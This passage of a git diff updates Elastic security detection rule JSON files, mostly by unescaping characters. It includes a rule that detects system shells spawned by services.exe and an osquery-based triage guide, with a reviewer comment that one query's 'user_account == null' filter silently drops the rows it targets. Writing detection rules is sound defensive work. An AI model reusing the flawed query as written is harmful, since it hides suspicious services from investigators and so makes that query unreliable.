Look for registry changes events or Windows events related to service activities (for example, 4697 and/or 7045).\n - Examine the created and existent services, the executables or drivers referenced, and command line arguments for suspicious entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the referenced files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check for commands executed under the spawned shell.\n\n### False positive analysis\n\n- This activity should not happen legitimately. 
The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service or restore it to the original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating System Shells via Services\n\nAttackers may configure existing services or create new ones to execute system shells to elevate their privileges from administrator to SYSTEM. They can also configure services to execute these shells with persistence payloads.\n\nThis rule looks for system shells being spawned by `services.exe`, which is compatible with the above behavior.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify how the service was created or modified. Look for registry changes events or Windows events related to service activities (for example, 4697 and/or 7045).\n - Examine the created and existent services, the executables or drivers referenced, and command line arguments for suspicious entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the referenced files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the 
environment by looking for similar occurrences across hosts.\n- Check for commands executed under the spawned shell.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service or restore it to the original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"services.exe\" and\n process.name : (\"cmd.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and\n\n /* Third party FP's */\n not process.args : \"NVDisplay.ContainerLocalSystem\"\n", "related_integrations": [ { @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", 
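Review bot: The embedded `Osquery - Retrieve Services Running on User Accounts` query in the new `note` string still filters with `user_account == null`, which in osquery's SQLite dialect evaluates to NULL rather than true or false; for any service whose account matches none of the LIKE patterns the OR chain becomes `0 OR NULL` = NULL, `NOT (NULL)` stays NULL, and the row is dropped, so the query appears to return no rows for exactly the services it is meant to surface. Replace that comparison with `user_account IS NULL` so the `NOT (...)` wrapper excludes only the system accounts and genuinely null accounts. The identical query text is repeated in the `note` hunk for 0022d47d-39c7-4f69-a232-4fe9dc7a3acd_108.json below. These `_107`/`_108` files look like frozen per-version copies, so the correction presumably belongs in the source rule and a new rule version rather than in these historical files.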
diff --git a/packages/security_detection_engine/kibana/security_rule/0022d47d-39c7-4f69-a232-4fe9dc7a3acd_108.json b/packages/security_detection_engine/kibana/security_rule/0022d47d-39c7-4f69-a232-4fe9dc7a3acd_108.json
index f1206254a02..76c4c4ef604 100644
--- a/packages/security_detection_engine/kibana/security_rule/0022d47d-39c7-4f69-a232-4fe9dc7a3acd_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/0022d47d-39c7-4f69-a232-4fe9dc7a3acd_108.json
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "System Shells via Services", - "note": "## Triage and analysis\n\n### Investigating System Shells via Services\n\nAttackers may configure existing services or create new ones to execute system shells to elevate their privileges from administrator to SYSTEM. They can also configure services to execute these shells with persistence payloads.\n\nThis rule looks for system shells being spawned by `services.exe`, which is compatible with the above behavior.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify how the service was created or modified. 
Look for registry changes events or Windows events related to service activities (for example, 4697 and/or 7045).\n - Examine the created and existent services, the executables or drivers referenced, and command line arguments for suspicious entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the referenced files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check for commands executed under the spawned shell.\n\n### False positive analysis\n\n- This activity should not happen legitimately. 
The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service or restore it to the original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating System Shells via Services\n\nAttackers may configure existing services or create new ones to execute system shells to elevate their privileges from administrator to SYSTEM. They can also configure services to execute these shells with persistence payloads.\n\nThis rule looks for system shells being spawned by `services.exe`, which is compatible with the above behavior.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify how the service was created or modified. Look for registry changes events or Windows events related to service activities (for example, 4697 and/or 7045).\n - Examine the created and existent services, the executables or drivers referenced, and command line arguments for suspicious entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the referenced files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the 
environment by looking for similar occurrences across hosts.\n- Check for commands executed under the spawned shell.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service or restore it to the original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"services.exe\" and\n process.name : (\"cmd.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and\n\n /* Third party FP's */\n not process.args : \"NVDisplay.ContainerLocalSystem\"\n", "related_integrations": [ { @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -90,7 +90,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", 
diff --git a/packages/security_detection_engine/kibana/security_rule/00678712-b2df-11ed-afe9-f661ea17fbcc_1.json b/packages/security_detection_engine/kibana/security_rule/00678712-b2df-11ed-afe9-f661ea17fbcc_1.json
index ba62bbc672a..97b2e502ec2 100644
--- a/packages/security_detection_engine/kibana/security_rule/00678712-b2df-11ed-afe9-f661ea17fbcc_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/00678712-b2df-11ed-afe9-f661ea17fbcc_1.json
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/00678712-b2df-11ed-afe9-f661ea17fbcc_2.json b/packages/security_detection_engine/kibana/security_rule/00678712-b2df-11ed-afe9-f661ea17fbcc_2.json
index b4783715a71..505dcf52668 100644
--- a/packages/security_detection_engine/kibana/security_rule/00678712-b2df-11ed-afe9-f661ea17fbcc_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/00678712-b2df-11ed-afe9-f661ea17fbcc_2.json
@@ -56,7 +56,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/0136b315-b566-482f-866c-1d8e2477ba16_101.json b/packages/security_detection_engine/kibana/security_rule/0136b315-b566-482f-866c-1d8e2477ba16_101.json
index adc4756c366..703f2ef1c55 100644
--- a/packages/security_detection_engine/kibana/security_rule/0136b315-b566-482f-866c-1d8e2477ba16_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/0136b315-b566-482f-866c-1d8e2477ba16_101.json
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/0136b315-b566-482f-866c-1d8e2477ba16_102.json b/packages/security_detection_engine/kibana/security_rule/0136b315-b566-482f-866c-1d8e2477ba16_102.json
index c1776a8a920..86f5a212664 100644
--- a/packages/security_detection_engine/kibana/security_rule/0136b315-b566-482f-866c-1d8e2477ba16_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/0136b315-b566-482f-866c-1d8e2477ba16_102.json
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/015cca13-8832-49ac-a01b-a396114809f6_102.json b/packages/security_detection_engine/kibana/security_rule/015cca13-8832-49ac-a01b-a396114809f6_102.json
index a5d47000c5c..01bee6cb8c2 100644
--- a/packages/security_detection_engine/kibana/security_rule/015cca13-8832-49ac-a01b-a396114809f6_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/015cca13-8832-49ac-a01b-a396114809f6_102.json
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/015cca13-8832-49ac-a01b-a396114809f6_103.json b/packages/security_detection_engine/kibana/security_rule/015cca13-8832-49ac-a01b-a396114809f6_103.json
index 073ebb0ec56..31510ec0d96 100644
--- a/packages/security_detection_engine/kibana/security_rule/015cca13-8832-49ac-a01b-a396114809f6_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/015cca13-8832-49ac-a01b-a396114809f6_103.json
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/015cca13-8832-49ac-a01b-a396114809f6_104.json b/packages/security_detection_engine/kibana/security_rule/015cca13-8832-49ac-a01b-a396114809f6_104.json
index c44b0754390..adb2f91c465 100644
--- a/packages/security_detection_engine/kibana/security_rule/015cca13-8832-49ac-a01b-a396114809f6_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/015cca13-8832-49ac-a01b-a396114809f6_104.json
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/015cca13-8832-49ac-a01b-a396114809f6_205.json b/packages/security_detection_engine/kibana/security_rule/015cca13-8832-49ac-a01b-a396114809f6_205.json
index 717ccd395de..6fe8a6ce751 100644
--- a/packages/security_detection_engine/kibana/security_rule/015cca13-8832-49ac-a01b-a396114809f6_205.json
+++ b/packages/security_detection_engine/kibana/security_rule/015cca13-8832-49ac-a01b-a396114809f6_205.json
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/0171f283-ade7-4f87-9521-ac346c68cc9b_1.json b/packages/security_detection_engine/kibana/security_rule/0171f283-ade7-4f87-9521-ac346c68cc9b_1.json
index 3133587aaf4..47e9ac4ec4b 100644
--- a/packages/security_detection_engine/kibana/security_rule/0171f283-ade7-4f87-9521-ac346c68cc9b_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/0171f283-ade7-4f87-9521-ac346c68cc9b_1.json
@@ -47,7 +47,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
@@ -62,7 +62,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0043",
 "name": "Reconnaissance",
diff --git a/packages/security_detection_engine/kibana/security_rule/0171f283-ade7-4f87-9521-ac346c68cc9b_2.json b/packages/security_detection_engine/kibana/security_rule/0171f283-ade7-4f87-9521-ac346c68cc9b_2.json
index 9ab37a0e545..b7fd6b962f8 100644
--- a/packages/security_detection_engine/kibana/security_rule/0171f283-ade7-4f87-9521-ac346c68cc9b_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/0171f283-ade7-4f87-9521-ac346c68cc9b_2.json
@@ -52,7 +52,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
@@ -67,7 +67,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0043",
 "name": "Reconnaissance",
diff --git a/packages/security_detection_engine/kibana/security_rule/0171f283-ade7-4f87-9521-ac346c68cc9b_3.json b/packages/security_detection_engine/kibana/security_rule/0171f283-ade7-4f87-9521-ac346c68cc9b_3.json
index ccf0896a9c7..65c72e85404 100644
--- a/packages/security_detection_engine/kibana/security_rule/0171f283-ade7-4f87-9521-ac346c68cc9b_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/0171f283-ade7-4f87-9521-ac346c68cc9b_3.json
@@ -54,7 +54,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
@@ -69,7 +69,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0043",
 "name": "Reconnaissance",
diff --git a/packages/security_detection_engine/kibana/security_rule/0171f283-ade7-4f87-9521-ac346c68cc9b_4.json b/packages/security_detection_engine/kibana/security_rule/0171f283-ade7-4f87-9521-ac346c68cc9b_4.json
index 6b5dad5383e..fcd4fe84951 100644
--- a/packages/security_detection_engine/kibana/security_rule/0171f283-ade7-4f87-9521-ac346c68cc9b_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/0171f283-ade7-4f87-9521-ac346c68cc9b_4.json
@@ -55,7 +55,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
@@ -70,7 +70,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0043",
 "name": "Reconnaissance",
diff --git a/packages/security_detection_engine/kibana/security_rule/027ff9ea-85e7-42e3-99d2-bbb7069e02eb_101.json b/packages/security_detection_engine/kibana/security_rule/027ff9ea-85e7-42e3-99d2-bbb7069e02eb_101.json
index fc470961585..385390e3417 100644
--- a/packages/security_detection_engine/kibana/security_rule/027ff9ea-85e7-42e3-99d2-bbb7069e02eb_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/027ff9ea-85e7-42e3-99d2-bbb7069e02eb_101.json
@@ -55,7 +55,7 @@
 ],
 "risk_score": 47,
 "rule_id": "027ff9ea-85e7-42e3-99d2-bbb7069e02eb",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/027ff9ea-85e7-42e3-99d2-bbb7069e02eb_102.json b/packages/security_detection_engine/kibana/security_rule/027ff9ea-85e7-42e3-99d2-bbb7069e02eb_102.json
index 8d75e8d6eb8..65a4b419b66 100644
--- a/packages/security_detection_engine/kibana/security_rule/027ff9ea-85e7-42e3-99d2-bbb7069e02eb_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/027ff9ea-85e7-42e3-99d2-bbb7069e02eb_102.json
@@ -55,7 +55,7 @@
 ],
 "risk_score": 47,
 "rule_id": "027ff9ea-85e7-42e3-99d2-bbb7069e02eb",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/027ff9ea-85e7-42e3-99d2-bbb7069e02eb_103.json b/packages/security_detection_engine/kibana/security_rule/027ff9ea-85e7-42e3-99d2-bbb7069e02eb_103.json
index 777d6f46a6f..24fb6bf14c8 100644
--- a/packages/security_detection_engine/kibana/security_rule/027ff9ea-85e7-42e3-99d2-bbb7069e02eb_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/027ff9ea-85e7-42e3-99d2-bbb7069e02eb_103.json
@@ -55,7 +55,7 @@
 ],
 "risk_score": 47,
 "rule_id": "027ff9ea-85e7-42e3-99d2-bbb7069e02eb",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/027ff9ea-85e7-42e3-99d2-bbb7069e02eb_104.json b/packages/security_detection_engine/kibana/security_rule/027ff9ea-85e7-42e3-99d2-bbb7069e02eb_104.json
index 7aa41e259fd..17abfe79d1a 100644
--- a/packages/security_detection_engine/kibana/security_rule/027ff9ea-85e7-42e3-99d2-bbb7069e02eb_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/027ff9ea-85e7-42e3-99d2-bbb7069e02eb_104.json
@@ -54,7 +54,7 @@
 ],
 "risk_score": 47,
 "rule_id": "027ff9ea-85e7-42e3-99d2-bbb7069e02eb",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/02a23ee7-c8f8-4701-b99d-e9038ce313cb_3.json b/packages/security_detection_engine/kibana/security_rule/02a23ee7-c8f8-4701-b99d-e9038ce313cb_3.json
index 3a7b7a75c56..dee470872bc 100644
--- a/packages/security_detection_engine/kibana/security_rule/02a23ee7-c8f8-4701-b99d-e9038ce313cb_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/02a23ee7-c8f8-4701-b99d-e9038ce313cb_3.json
@@ -81,7 +81,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/02a23ee7-c8f8-4701-b99d-e9038ce313cb_4.json b/packages/security_detection_engine/kibana/security_rule/02a23ee7-c8f8-4701-b99d-e9038ce313cb_4.json
index 1a57d68d561..53e9be2281c 100644
--- a/packages/security_detection_engine/kibana/security_rule/02a23ee7-c8f8-4701-b99d-e9038ce313cb_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/02a23ee7-c8f8-4701-b99d-e9038ce313cb_4.json
@@ -80,7 +80,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/02a23ee7-c8f8-4701-b99d-e9038ce313cb_5.json b/packages/security_detection_engine/kibana/security_rule/02a23ee7-c8f8-4701-b99d-e9038ce313cb_5.json
index 397301722f1..c82976ac053 100644
--- a/packages/security_detection_engine/kibana/security_rule/02a23ee7-c8f8-4701-b99d-e9038ce313cb_5.json
+++ b/packages/security_detection_engine/kibana/security_rule/02a23ee7-c8f8-4701-b99d-e9038ce313cb_5.json
@@ -81,7 +81,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/02a4576a-7480-4284-9327-548a806b5e48_103.json b/packages/security_detection_engine/kibana/security_rule/02a4576a-7480-4284-9327-548a806b5e48_103.json
index 1167bfae386..342168c6e17 100644
--- a/packages/security_detection_engine/kibana/security_rule/02a4576a-7480-4284-9327-548a806b5e48_103.json
